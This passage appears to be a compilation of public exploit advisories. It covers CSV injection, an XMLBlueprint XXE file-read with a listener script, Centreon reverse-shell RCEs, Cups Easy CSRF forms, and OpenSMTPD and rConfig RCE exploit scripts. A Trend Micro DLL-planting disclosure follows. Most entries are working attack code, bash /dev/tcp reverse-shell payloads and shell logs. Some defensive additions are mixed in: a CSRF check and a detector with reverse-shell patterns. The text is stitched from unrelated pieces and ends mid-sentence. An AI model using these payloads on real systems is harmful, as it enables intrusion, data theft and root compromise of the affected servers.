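        if (*p == '"')
            out[n++] = '"';
        out[n++] = *p;
    }
    out[n++] = '"';
    out[n] = '\0';
    return n;
}

/* Helper for checks: does cell neutralise to exactly expected? */
int neutralizes_to(const char *cell, const char *expected)
{
    char buf[256];
    return csv_neutralize(cell, buf, sizeof buf) != 0 && strcmp(buf, expected) == 0;
}

int main(void)
{
    /* the payload quoted in step 7 of the PoC */
    const char *label = "@SUM(1+1)*cmd|' /c calc'!A0";
    char buf[256];
    csv_neutralize(label, buf, sizeof buf);
    printf("dangerous=%d exported as %s\n", csv_cell_is_dangerous(label), buf);
    return 0;
}
```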
# Timeline
15-01-2020 - Vulnerability discovered
27-01-2020 - Vendor contacted
28-01-2020 - Vendor responded, not marking it as a security flaw. Git issue has been created. (https://github.com/elastic/kibana/issues/56081)
28-01-2020 - Requested vendor for disclosure.
29-01-2020 - Full Disclosure
XMLBlueprint 16.191112 XML Injection
XMLBlueprint version 16.191112 suffers from an XML external entity injection vulnerability.
# Exploit Title: XMLBlueprint 16.191112 - XML External Entity Injection
# Exploit Author: Javier Olmedo
# Date: 2018-11-14
# Vendor: XMLBlueprint XML Editor
# Software Link: https://www.xmlblueprint.com/update/download-64bit.exe
# Affected Version: 16.191112 and before
# Patched Version: unpatched
# Category: Local
# Platform: XML
# Tested on: Windows 10 Pro
# CWE: https://cwe.mitre.org/data/definitions/611.html
# CVE: 2019-19032
# References:
# https://hackpuntes.com/cve-2019-19032-xmlblueprint-16-191112-inyeccion-xml/
# 1. Technical Description
# XMLBlueprint XML Editor version 16.191112 and before are affected by XML External Entity
# Injection vulnerability through the malicious XML file. This allows a malicious user
# to read arbitrary files.
# 2. Proof Of Concept (PoC)
# 2.1 Start a webserver to receive the connection.
python -m SimpleHTTPServer 80
# 2.2 Upload the payload.dtd file to your web server.
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:80/?%file;'>">
%all;
# 2.3 Create a secret.txt file with any content in desktop.
# 2.4 Open poc.xml and click XML -> Validate
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "file:///C:\Users\jolmedo\Desktop\secret.txt">
<!ENTITY % dtd SYSTEM "http://localhost:80/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
# 2.5 Your web server will receive a request carrying the contents of secret.txt.
# (The log below was captured with the listener on port 8000; the port in payload.dtd and poc.xml must match the port the server actually listens on.)
Serving HTTP on 0.0.0.0 port 8000 ...
192.168.100.23 - - [11/Nov/2019 08:23:52] "GET /payload.dtd HTTP/1.1" 200 -
192.168.100.23 - - [11/Nov/2019 08:23:52] "GET /?THIS%20IS%20A%20SECRET%20FILE HTTP/1.1" 200 -
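The following is an added example and not part of the original advisory: it generates the payload.dtd / poc.xml pair from a single listener setting, so the port cannot drift between the two files and the server command line, and it decodes what the victim leaks back in the callback. The listener address, the LeakHandler class and the function names are assumptions for illustration. The technique only works cleanly for content that fits in a URL: a file containing newlines or other characters illegal in a URL will usually make the parser reject the constructed URL rather than send it.

```python
# Added example, not part of the original advisory: builds the payload.dtd /
# poc.xml pair from one LISTENER value and decodes the leaked content.
# LISTENER and TARGET_FILE are assumptions; change them for your setup.
import urllib.parse
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Optional

LISTENER = "localhost:80"       # host:port the victim can reach; must match the server you start
TARGET_FILE = r"C:\Users\jolmedo\Desktop\secret.txt"


def build_payload_dtd(listener: str = LISTENER) -> str:
    """External DTD: embeds the expanded %file; entity into a URL the parser fetches."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f"<!ENTITY % all \"<!ENTITY send SYSTEM 'http://{listener}/?%file;'>\">\n"
        "%all;\n"
    )


def build_poc_xml(target_file: str = TARGET_FILE, listener: str = LISTENER) -> str:
    """Document the victim validates: %file; reads the secret, %dtd; pulls payload.dtd."""
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE test [\n"
        f'<!ENTITY % file SYSTEM "file:///{target_file}">\n'
        f'<!ENTITY % dtd SYSTEM "http://{listener}/payload.dtd">\n'
        "%dtd;]>\n"
        "<pwn>&send;</pwn>\n"
    )


def decode_leak(request_path: str) -> Optional[str]:
    """Recover the file content from a '/?<percent-encoded content>' callback.

    Returns None for any other request, e.g. the fetch of payload.dtd itself.
    """
    parts = urllib.parse.urlsplit(request_path)
    if parts.path != "/" or not parts.query:
        return None
    return urllib.parse.unquote(parts.query)


class LeakHandler(BaseHTTPRequestHandler):
    """Serves payload.dtd and prints whatever the victim leaks in the query string."""

    def do_GET(self):
        if self.path == "/payload.dtd":
            body = build_payload_dtd().encode()
            self.send_response(200)
            self.send_header("Content-Type", "application/xml-dtd")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)
            return
        leaked = decode_leak(self.path)
        if leaked is not None:
            print(f"[+] {self.client_address[0]} leaked: {leaked!r}")
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()


if __name__ == "__main__":
    with open("poc.xml", "w") as fh:
        fh.write(build_poc_xml())
    host, port = LISTENER.rsplit(":", 1)
    print(f"[*] wrote poc.xml; serving payload.dtd on 0.0.0.0:{port}")
    HTTPServer(("0.0.0.0", int(port)), LeakHandler).serve_forever()
```

Run it on the attacker host, copy the generated poc.xml to the victim and validate it in the editor; the leaked content is printed when the second request arrives.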
# 3. Timeline
# 13, november 2019 - [RESEARCHER] Discover
# 13, november 2019 - [RESEARCHER] Report to vendor support
# 14, november 2019 - [DEVELOPER] Unrecognized vulnerability
# 15, november 2019 - [RESEARCHER] Detailed vulnerability report
# 22, november 2019 - [RESEARCHER] Public disclosure
# 4. Disclaimer
# The information contained in this notice is provided without any guarantee of use or otherwise.
# The redistribution of this notice is explicitly permitted for insertion into vulnerability
# databases, provided that it is not modified and due credit is granted to the author.
# The author prohibits the malicious use of the information contained herein and accepts no responsibility.
# All content (c)
# Javier Olmedo
Centreon 19.10.5 Remote Command Execution
Centreon version 19.10.5 suffers from a centreontrapd remote command execution vulnerability.
e4cd583822c0120dac35bdb7b26bf32b
# Exploit Title: Centreon 19.10.5 - 'centreontrapd' Remote Command Execution
# Date: 2020-01-29
# Exploit Author: Fabien AUNAY, Omri Baso
# Vendor Homepage: https://www.centreon.com/
# Software Link: https://github.com/centreon/centreon
# Version: 19.10.5
# Tested on: CentOS 7
# CVE : -
###########################################################################################################
Centreon 19.10.5 Remote Command Execution centreontrapd
Trusted by SMBs and Fortune 500 companies worldwide.
An industry reference in IT Infrastructure monitoring for the enterprise.
Counts 200,000+ ITOM users worldwide and an international community of software collaborators.
Presence in Toronto and Luxembourg.
Deployed in diverse sectors:
- IT & telecommunication
- Transportation
- Government
- Health care
- Retail
- Utilities
- Finance & Insurance
- Aerospace & Defense
- Manufacturing
- etc.
It is possible to get a reverse shell from an SNMP trap and use the host as a pivot inside a distributed architecture.
Steps:
Objective 1 : Create an SNMP trap, or reuse the linkDown OID, with a special command
Objective 2 : Create a passive service that uses App-Monitoring-Centreon-Service-Dummy
Objective 3 : Assign the service/trap relation
Objective 4 : Get a reverse shell as the centreon user
###########################################################################################################
# Objective 1 : Create or use SNMP trap OID with special command in action 3
- Configuration > SNMP Traps
[+] Trap name * : linkDown
[+] OID * : .1.3.6.1.6.3.1.1.5.3
[+] Special Command : 0<&121-;exec 121<>/dev/tcp/127.0.0.1/12345;sh <&121 >&121 2>&121
# Objective 2 : Create passive service and use App-Monitoring-Centreon-Service-Dummy
- Configuration > Services > Services by host
[+] Description * : TRAP RCE
[+] Linked with Hosts * : YOUR-LINKED-HOST
[+] Check Command * : App-Monitoring-Centreon-Service-Dummy
[+] DUMMYSTATUS : 0
[+] DUMMYOUTPUT : 0
[+] Passive Checks Enabled : YES
[+] Is Volatile : YES
[+] Service Trap Relation : Generic - linkDown
# Objective 3 : Assign service trap relation
- Configuration > SNMP Traps
- linkDown
- Relations
[+] Linked services : YOUR-LINKED-HOST - SERVICE DESCRIPTION
Reload the Central poller
Reload the SNMP trap configuration
# Objective 4 : Get a reverse shell as the centreon user and think laterally
[+] Send your trap
snmptrap -v2c -c public 127.0.0.1 '' .1.3.6.1.6.3.1.1.5.3 ifIndex i 1 ifadminStatus i 2 ifOperStatus i 2
TIP: centreontrapd logfile:
2020-01-29 02:52:33 - DEBUG - 340 - Reading trap. Current time: Wed Jan 29 02:52:33 2020
2020-01-29 02:52:33 - DEBUG - 340 - Symbolic trap variable name detected (DISMAN-EVENT-MIB::sysUpTimeInstance). Will attempt to translate to a numerical OID
2020-01-29 02:52:33 - DEBUG - 340 - Translated to .1.3.6.1.2.1.1.3.0
2020-01-29 02:52:33 - DEBUG - 340 - Symbolic trap variable name detected (SNMPv2-MIB::snmpTrapOID.0). Will attempt to translate to a numerical OID
...
2020-01-29 02:52:33 - DEBUG - 340 - Trap found on service 'TRAP RCE' for host 'supervision_IT'.
...
2020-01-29 02:52:43 - INFO - 1757 - EXEC: Launch specific command
2020-01-29 02:52:43 - INFO - 1757 - EXEC: Launched command: 0<&121-;exec 121<>/dev/tcp/127.0.0.1/12345;sh <&121 >&121 2>&121
..
NOTE: Read the documentation!
https://documentation-fr.centreon.com/docs/centreon/fr/latest/administration_guide/poller/ssh_key.html?highlight=keygen
The centreon user shares configurations and instructions with the satellite collectors through SSH,
using a key with no passphrase.
This lets you move around the infrastructure after the RCE.
POC:
snmptrap -v2c -c public 127.0.0.1 '' .1.3.6.1.6.3.1.1.5.3 ifIndex i 1 ifadminStatus i 2 ifOperStatus i 2
nc -lvnp 12345
Ncat: Version 7.50
Ncat: Listening on :::12345
Ncat: Listening on 0.0.0.0:12345
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:38470.
id
uid=997(centreon) gid=994(centreon) groups=994(centreon),48(apache),990(centreon-engine),992(centreon-broker)
sudo -l
Matching Defaults entries for centreon on centreonlab:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin, !requiretty
User centreon may run the following commands on centreonlab:
(root) NOPASSWD: /sbin/service centreontrapd start
(root) NOPASSWD: /sbin/service centreontrapd stop
(root) NOPASSWD: /sbin/service centreontrapd restart
(root) NOPASSWD: /sbin/service centreontrapd reload
(root) NOPASSWD: /usr/sbin/service centreontrapd start
(root) NOPASSWD: /usr/sbin/service centreontrapd stop
(root) NOPASSWD: /usr/sbin/service centreontrapd restart
(root) NOPASSWD: /usr/sbin/service centreontrapd reload
(root) NOPASSWD: /sbin/service centengine start
(root) NOPASSWD: /sbin/service centengine stop
(root) NOPASSWD: /sbin/service centengine restart
(root) NOPASSWD: /sbin/service centengine reload
(root) NOPASSWD: /usr/sbin/service centengine start
(root) NOPASSWD: /usr/sbin/service centengine stop
(root) NOPASSWD: /usr/sbin/service centengine restart
(root) NOPASSWD: /usr/sbin/service centengine reload
(root) NOPASSWD: /bin/systemctl start centengine
(root) NOPASSWD: /bin/systemctl stop centengine
(root) NOPASSWD: /bin/systemctl restart centengine
(root) NOPASSWD: /bin/systemctl reload centengine
(root) NOPASSWD: /usr/bin/systemctl start centengine
(root) NOPASSWD: /usr/bin/systemctl stop centengine
(root) NOPASSWD: /usr/bin/systemctl restart centengine
(root) NOPASSWD: /usr/bin/systemctl reload centengine
(root) NOPASSWD: /sbin/service cbd start
(root) NOPASSWD: /sbin/service cbd stop
(root) NOPASSWD: /sbin/service cbd restart
(root) NOPASSWD: /sbin/service cbd reload
(root) NOPASSWD: /usr/sbin/service cbd start
(root) NOPASSWD: /usr/sbin/service cbd stop
(root) NOPASSWD: /usr/sbin/service cbd restart
(root) NOPASSWD: /usr/sbin/service cbd reload
(root) NOPASSWD: /bin/systemctl start cbd
(root) NOPASSWD: /bin/systemctl stop cbd
(root) NOPASSWD: /bin/systemctl restart cbd
(root) NOPASSWD: /bin/systemctl reload cbd
(root) NOPASSWD: /usr/bin/systemctl start cbd
(root) NOPASSWD: /usr/bin/systemctl stop cbd
(root) NOPASSWD: /usr/bin/systemctl restart cbd
(root) NOPASSWD: /usr/bin/systemctl reload cbd
Cups Easy 1.0 Cross Site Request Forgery
Cups Easy version 1.0 suffers from a cross site request forgery vulnerability.
cafc75de89af6e63e57122e223d909bb
# Title: Cups Easy 1.0 - Cross Site Request Forgery (Password Reset)
# Date: 2020-01-28
# Exploit Author: J3rryBl4nks
# Vendor Homepage: https://sourceforge.net/u/ajayshar76/profile/
# Software Link: https://sourceforge.net/projects/cupseasy/files/cupseasylive-1.0/
# Version: 1.0
# Tested on Windows 10/Kali Rolling
# CVE: CVE-2020-8424, CVE-2020-8425
# The Cups Easy (Purchase & Inventory) 1.0 web application is vulnerable to Cross Site Request Forgery
# that would allow an attacker to change the Admin password and gain unrestricted
# access to the site or delete any user.
# Proof of Concept Code for Password Change:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://SITEADDRESS/cupseasylive/passwordmychange.php" method="POST">
<input type="hidden" name="username" value="admin" />
<input type="hidden" name="password" value="PASSWORDHERE" />
<input type="hidden" name="change" value="Change" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
# Proof of concept for user delete:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://SITEADDRESS/cupseasylive/userdelete.php" method="POST">
<input type="hidden" name="username" value="admin" />
<input type="hidden" name="delete" value="Delete" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
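As an added example, and not Cups Easy code, here is the server-side check that would have stopped both forged POSTs above: a per-session synchronizer token verified with a constant-time compare, plus an Origin/Referer check as a second line of defence. The secret, the trusted origin, the csrf_token field and all function names are assumptions for illustration; Cups Easy 1.0 has no such field.

```python
# Added example, not Cups Easy code: server-side CSRF protection of the kind
# passwordmychange.php / userdelete.php lack. SECRET, TRUSTED_ORIGINS and the
# csrf_token field are assumptions for illustration.
import hashlib
import hmac
import os
import time
from typing import Mapping, Optional

SECRET = os.urandom(32)                     # per-deployment key, in practice loaded from config
TOKEN_TTL = 3600                            # seconds a token stays valid
TRUSTED_ORIGINS = {"http://SITEADDRESS"}    # scheme://host[:port] of the application


def _mac(session_id: str, expiry: int, secret: bytes) -> str:
    return hmac.new(secret, f"{session_id}|{expiry}".encode(), hashlib.sha256).hexdigest()


def issue_token(session_id: str, secret: bytes = SECRET, now: Optional[int] = None) -> str:
    """Synchronizer token bound to the session: '<expiry>.<HMAC(secret, session|expiry)>'.
    Embed it as a hidden field in every state-changing form."""
    expiry = (now if now is not None else int(time.time())) + TOKEN_TTL
    return f"{expiry}.{_mac(session_id, expiry, secret)}"


def verify_token(session_id: str, token: str, secret: bytes = SECRET, now: Optional[int] = None) -> bool:
    """True only if the token was minted for this session and has not expired."""
    try:
        expiry_str, mac = token.split(".", 1)
        expiry = int(expiry_str)
    except ValueError:
        return False
    current = now if now is not None else int(time.time())
    if current > expiry:
        return False
    # constant-time compare: a plain == would leak how many leading hex digits matched
    return hmac.compare_digest(_mac(session_id, expiry, secret), mac)


def origin_allowed(headers: Mapping[str, str]) -> bool:
    """Second line of defence: a form auto-submitted from attacker.example carries
    that site's Origin (or Referer), never ours."""
    origin = headers.get("Origin")
    if origin is None:
        scheme_host = headers.get("Referer", "").split("/", 3)[:3]
        origin = "/".join(scheme_host) if len(scheme_host) == 3 else None
    return origin in TRUSTED_ORIGINS


def handle_password_change(session_user: str, session_id: str,
                           form: Mapping[str, str], headers: Mapping[str, str]) -> str:
    """Checks a hardened passwordmychange.php would run before touching the database.
    The account comes from the session, never from the 'username' form field."""
    if not origin_allowed(headers):
        return "rejected: cross-site origin"
    if not verify_token(session_id, form.get("csrf_token", "")):
        return "rejected: bad or missing csrf token"
    return f"ok: password changed for {session_user}"
```

Note the second fix folded into handle_password_change: the PoC sets username=admin in the forged form, so even with a token the target account must be taken from the authenticated session rather than from the request.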
Centreon 19.10.5 Remote Command Execution
Centreon version 19.10.5 suffers from a Pollers remote command execution vulnerability.
74b4928a515161688d46037ed3182142
# Exploit Title: Centreon 19.10.5 - 'Pollers' Remote Command Execution
# Date: 2020-01-27
# Exploit Author: Omri Baso, Fabien Aunay
# Vendor Homepage: https://www.centreon.com/
# Software Link: https://github.com/centreon/centreon
# Version: 19.10.5
# Tested on: CentOS 7.7
# CVE : -
Centreon 19.10.5 Remote Command Execution Misc
Trusted by SMBs and Fortune 500 companies worldwide.
An industry reference in IT Infrastructure monitoring for the enterprise.
Counts 200,000+ ITOM users worldwide and an international community of software collaborators.
Presence in Toronto and Luxembourg.
Deployed in diverse sectors:
- IT & telecommunication
- Transportation
- Government
- Health care
- Retail
- Utilities
- Finance & Insurance
- Aerospace & Defense
- Manufacturing
- etc.
User input is not sanitized for safe use, and it is possible to gain remote code execution on the server
hosting the Centreon service as the "apache" user.
Steps:
1.) <BASEURL>/centreon/main.php?p=60803&type=3
Here we create the command; the page can also be reached via
Configuration > Commands > Miscellaneous
Press "Add":
Command Name: "misc"
Payload: 0<&121-;exec 121<>/dev/tcp/127.0.0.1/1234;sh <&121 >&121 2>&121
2.) Go to: <BASEURL>/centreon/main.php?p=60901
Configuration > Pollers
Open the "Central" poller
Set "Post-Restart command" to
the command "misc" we created
and set Status to "Enabled"
3.) Check the box "Post generation command" in the "Export Configuration" tab
3.1) Restart the poller and get a shell.
┌─[root@vps]─[~]
└──╼ #nc -lnvp 1234
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:49184.
whoami
apache
id
uid=48(apache) gid=48(apache) groups=48(apache),990(centreon-engine),992(centreon-broker),993(nagios),994(centreon)
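Both Centreon PoCs, the centreontrapd special command in the earlier advisory and the poller post-restart command here, end with the same bash /dev/tcp callback stored in a field the web UI treats as a command. The following is an added detection example and not Centreon code: it pulls the command out of centreontrapd "EXEC: Launched command:" log lines, or takes raw command definitions, and flags the usual reverse-shell idioms. The sample lines are constructed from the advisories' excerpts; the benign plugin line and the pattern list are assumptions.

```python
# Added detection example, not Centreon code: flags reverse-shell idioms in
# centreontrapd EXEC log lines and in raw command definitions. The SAMPLE lines
# are constructed from the advisories' excerpts; the benign line is invented.
import re
from typing import Iterable, List, Tuple

# Idioms used by both PoCs (bash /dev/tcp redirection, fd juggling via exec)
# plus common alternatives. Tune for your environment.
SUSPICIOUS = [
    re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+"),
    re.compile(r"\bexec\s+\d+<>"),
    re.compile(r"\b(?:ba)?sh\s+-i\b"),
    re.compile(r"\bnc\b.*\s-e\s"),
    re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba)?sh\b"),
]
# centreontrapd logs the special command it is about to run behind this marker
# (see the log excerpt in the centreontrapd advisory).
TRAPD_EXEC = re.compile(r"EXEC: Launched command:\s*(?P<cmd>.+)$")


def extract_command(line: str) -> str:
    """Command part of a centreontrapd EXEC line; any other line is returned whole,
    so command definitions exported from Configuration > Commands can be fed in too."""
    m = TRAPD_EXEC.search(line)
    return m.group("cmd") if m else line


def find_reverse_shell_commands(lines: Iterable[str]) -> List[Tuple[int, str, str]]:
    """(line number, matching pattern, command) for every line that looks like a callback."""
    hits = []
    for n, raw in enumerate(lines, 1):
        cmd = extract_command(raw.rstrip("\n"))
        for pat in SUSPICIOUS:
            if pat.search(cmd):
                hits.append((n, pat.pattern, cmd))
                break
    return hits


# Constructed sample: two lines modelled on the centreontrapd log above, a benign
# (invented) plugin invocation, and the 'misc' command body from the Pollers PoC.
SAMPLE = [
    "2020-01-29 02:52:43 - INFO - 1757 - EXEC: Launch specific command",
    "2020-01-29 02:52:43 - INFO - 1757 - EXEC: Launched command: 0<&121-;exec 121<>/dev/tcp/127.0.0.1/12345;sh <&121 >&121 2>&121",
    "2020-01-29 02:53:10 - INFO - 1757 - EXEC: Launched command: /usr/lib/nagios/plugins/check_ping -H 192.0.2.10 -w 100,10% -c 200,20%",
    "0<&121-;exec 121<>/dev/tcp/127.0.0.1/1234;sh <&121 >&121 2>&121",
]

if __name__ == "__main__":
    for n, pattern, cmd in find_reverse_shell_commands(SAMPLE):
        print(f"line {n}: {pattern!r} matched: {cmd}")
```

Feed it the centreontrapd log or a dump of the command definitions; anything it flags on a monitoring server deserves a look, since legitimate check commands have no reason to open a TCP connection from a shell redirection.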
___________________________________________________________________
OpenSMTPD 6.6.2 Remote Code Execution
OpenSMTPD version 6.6.2 remote code execution exploit.
720e1a175b5cc8abf21ab6dbeb5c21e7
# Exploit Title: OpenSMTPD 6.6.2 - Remote Code Execution
# Date: 2020-01-29
# Exploit Author: 1F98D
# Original Author: Qualys Security Advisory
# Vendor Homepage: https://www.opensmtpd.org/
# Software Link: https://github.com/OpenSMTPD/OpenSMTPD/releases/tag/6.6.1p1
# Version: OpenSMTPD < 6.6.2
# Tested on: Debian 9.11 (x64)
# CVE: CVE-2020-7247
# References:
# https://www.openwall.com/lists/oss-security/2020/01/28/3
#
# OpenSMTPD after commit a8e222352f and before version 6.6.2 does not adequately
# escape dangerous characters (such as ';') in the sender address given in MAIL FROM,
# which is later handed to a shell during local delivery. An attacker
# can exploit this to execute arbitrary shell commands on the target as root.
#
#!/usr/local/bin/python3
from socket import *
import sys
if len(sys.argv) != 4:
print('Usage {} <target ip> <target port> <command>'.format(sys.argv[0]))
print("E.g. {} 127.0.0.1 25 'touch /tmp/x'".format(sys.argv[0]))
sys.exit(1)
ADDR = sys.argv[1]
PORT = int(sys.argv[2])
CMD = sys.argv[3]
s = socket(AF_INET, SOCK_STREAM)
s.connect((ADDR, PORT))
res = s.recv(1024)
if 'OpenSMTPD' not in str(res):
print('[!] No OpenSMTPD detected')
print('[!] Received {}'.format(str(res)))
print('[!] Exiting...')
sys.exit(1)
print('[*] OpenSMTPD detected')
s.send(b'HELO x\r\n')
res = s.recv(1024)
if '250' not in str(res):
print('[!] Error connecting, expected 250')
print('[!] Received: {}'.format(str(res)))
print('[!] Exiting...')
sys.exit(1)
print('[*] Connected, sending payload')
# The sender's local part reaches a shell unescaped, so the ';' turns CMD into its own command
s.send(bytes('MAIL FROM:<;{};>\r\n'.format(CMD), 'utf-8'))
res = s.recv(1024)
if '250' not in str(res):
print('[!] Error sending payload, expected 250')
print('[!] Received: {}'.format(str(res)))
print('[!] Exiting...')
sys.exit(1)
print('[*] Payload sent')
s.send(b'RCPT TO:<root>\r\n')
s.recv(1024)
s.send(b'DATA\r\n')
s.recv(1024)
s.send(b'\r\nxxx\r\n.\r\n')
s.recv(1024)
s.send(b'QUIT\r\n')
s.recv(1024)
print('[*] Done')
rConfig 3.9.3 Remote Code Execution
rConfig version 3.9.3 suffers from an authenticated remote code execution vulnerability.
26b376c625041af03fef93e48412214a
# Exploit Title: rConfig 3.9.3 - Authenticated Remote Code Execution
# Date: 2019-11-07
# CVE-2019-19509
# Exploit Author: vikingfr
# Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig)
# Software Link : http://files.rconfig.com/downloads/scripts/centos7_install.sh
# Version: tested v3.9.3
# Tested on: Apache/2.4.6 (CentOS 7.7) OpenSSL/1.0.2k-fips PHP/7.2.24
#
# Notes : If you want to reproduce in your lab environment follow those links :
# http://help.rconfig.com/gettingstarted/installation
# then
# http://help.rconfig.com/gettingstarted/postinstall
#
# $ python3 rconfig_CVE-2019-19509.py https://192.168.43.34 admin root 192.168.43.245 8081
# rconfig - CVE-2019-19509 - Web authenticated RCE
# [+] Logged in successfully, triggering the payload...
# [+] Check your listener !
# ...
# $ nc -nvlp 8081
# listening on [any] 8081 ...
# connect to [192.168.43.245] from (UNKNOWN) [192.168.43.34] 34458
# bash: no job control in this shell
# bash-4.2$ id
# id
# uid=48(apache) gid=48(apache) groups=48(apache)
# bash-4.2$
#!/usr/bin/python3
import requests
import sys
import urllib.parse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
print ("rconfig - CVE-2019-19509 - Web authenticated RCE")
if len(sys.argv) != 6:
print ("[+] Usage : ./rconfig_exploit.py https://target username password yourIP yourPort")
exit()
target = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
ip = sys.argv[4]
port = sys.argv[5]
# The backticks are evaluated when rConfig interpolates the 'path' value into a shell command
payload = '''`bash -i>& /dev/tcp/{0}/{1} 0>&1`'''.format(ip, port)
request = requests.session()
login_info = {
"user": username,
"pass": password,
"sublogin": 1
}
login_request = request.post(
target+"/lib/crud/userprocess.php",
login_info,
verify=False,
allow_redirects=True
)
dashboard_request = request.get(target+"/dashboard.php", allow_redirects=False)
if dashboard_request.status_code == 200:
print ("[+] Logged in successfully, triggering the payload...")
# ajaxArchiveFiles.php passes 'path' to a shell without sanitisation; 'ext' only needs to be present
encoded_request = target+"/lib/ajaxHandlers/ajaxArchiveFiles.php?path={0}&ext=random".format(urllib.parse.quote(payload))
print ("[+] Check your listener !")
exploit_req = request.get(encoded_request)
elif dashboard_request.status_code == 302:
print ("[-] Wrong credentials !")
exit()
TrendMicro Anti-Threat Toolkit Improper Fix
The fix that was applied to address a code execution vulnerability in Trend Micro Anti-Threat Toolkit (ATTK) was insufficient.
d1a12b9a4603d65949a06bbd3e3891bd
Hi @ll,
on September 29, 2019, John Page reported a remote code execution
with escalation of privilege in TrendMicro's Anti-Threat Toolkit
to its vendor.
TrendMicro assigned CVE-2019-9491 to this vulnerability and told
the reporter, his dog and the world on October 18, 2019, that they
had fixed the vulnerable product.
See <https://success.trendmicro.com/solution/000149878>,
<https://seclists.org/fulldisclosure/2019/Oct/42> and
<http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-ANTI-THREAT-TOOLKIT-(ATTK)-REMOTE-CODE-EXECUTION.txt>
TrendMicro's claim was wrong: the vulnerability was NOT FIXED!
The files attk_ScanCleanOffline_gui_x86.exe, attk_collector_cli_x86.exe,
attk_ScanCleanOffline_gui_x64.exe and attk_collector_cli_x64.exe
offered on <https://spnsupport.trendmicro.com/> were STILL vulnerable,
as was their payload!
Vulnerability #1:
~~~~~~~~~~~~~~~~~
On a fully patched Windows 7 SP1, the executable self-extractors
attk_ScanCleanOffline_gui_x86.exe, attk_collector_cli_x86.exe,
attk_ScanCleanOffline_gui_x64.exe and attk_collector_cli_x64.exe
loaded and executed at least the following DLLs from their
"application directory", typically the user's "Downloads" folder
%USERPROFILE%\Downloads\, instead of from Windows' "system directory"
%SystemRoot%\System32\
VERSION.dll, IPHLPAPI.dll, WINNSI.dll, WINHTTP.dll, WEBIO.dll,
DHCPCSVC.dll, CRYPTSP.dll, BCRYPT.dll, NCRYPT.dll, DNSAPI.dll,
RASADHLP.dll, PROPSYS.dll, APPHELP.dll
On other versions of Windows this list varied, but some DLLs were
ALWAYS loaded from the "application directory"!
This BEGINNER's error is well-known and has been documented for MORE
than 20 years:
see <https://capec.mitre.org/data/definitions/471.html>,
<https://cwe.mitre.org/data/definitions/426.html>,
<https://cwe.mitre.org/data/definitions/427.html>,
<https://blogs.msdn.microsoft.com/david_leblanc/2008/02/20/dll-preloading-attacks/>,
<https://insights.sei.cmu.edu/cert/2008/09/carpet-bombing-and-directory-poisoning.html>,
<http://www.binaryplanting.com/index.htm>,
<https://attack.mitre.org/wiki/Technique/T1073>,
<https://skanthak.homepage.t-online.de/sentinel.html>,
<https://skanthak.homepage.t-online.de/verifier.html>,
<https://skanthak.homepage.t-online.de/!execute.html>,
<https://skanthak.homepage.t-online.de/minesweeper.html>
Demonstration/Proof of concept:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Follow <https://skanthak.homepage.t-online.de/minesweeper.html>,
build a "minefield" of forwarder DLLs, then copy attk_*.exe into
the directory where you built the DLLs and execute it: enjoy the
multiple message boxes displayed from the forwarder DLLs.
Vulnerability #2:
~~~~~~~~~~~~~~~~~
On all versions of Windows, the batch script batCollector.bat,
unpacked from the executable extractors, which controls execution
of the TrendMicro AntiThreat Toolkit itself, executed
findstr.com/findstr.exe/findstr.bat/findstr.cmd
plus
REG.com/REG.exe/REG.bat/REG.cmd
(see the environment variable PATHEXT for the extensions) from
the directory
"TrendMicro AntiThreat Toolkit\HC_ATTK"
where the batch script batCollector.bat lives:
--- batCollector.bat ---
| @echo off
| setlocal disableDelayedExpansion
| set wd=%~dp0
| cd /d %wd%
...
| for /f "tokens=*" %%a in ('findstr BatCollector= ..\..\config.ini') do (
...
| REG EXPORT ...
...
findstr and REG are called in the script without file extension and
without path (although BOTH are well-known), so CMD.exe runs
findstr.com/findstr.exe/findstr.bat/findstr.cmd and
REG.com/REG.exe/REG.bat/REG.cmd from its "current working directory"
"TrendMicro AntiThreat Toolkit\HC_ATTK"
The missing path and extension are BEGINNER'S error #2.
Again see <https://cwe.mitre.org/data/definitions/426.html>,
<https://cwe.mitre.org/data/definitions/427.html>
and <https://capec.mitre.org/data/definitions/471.html>
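An added example, not Trend Micro's or the author's code, to make the resolution order concrete: it lists the commands a batch script invokes without path or extension and mimics how CMD.EXE resolves such a name, trying the current directory before every PATH entry and, within each directory, every PATHEXT extension in order. The batch excerpt and the file layout are constructed to mirror batCollector.bat (arguments invented); the PATH and PATHEXT values are Windows defaults and the resolver only approximates CMD.EXE's rules.
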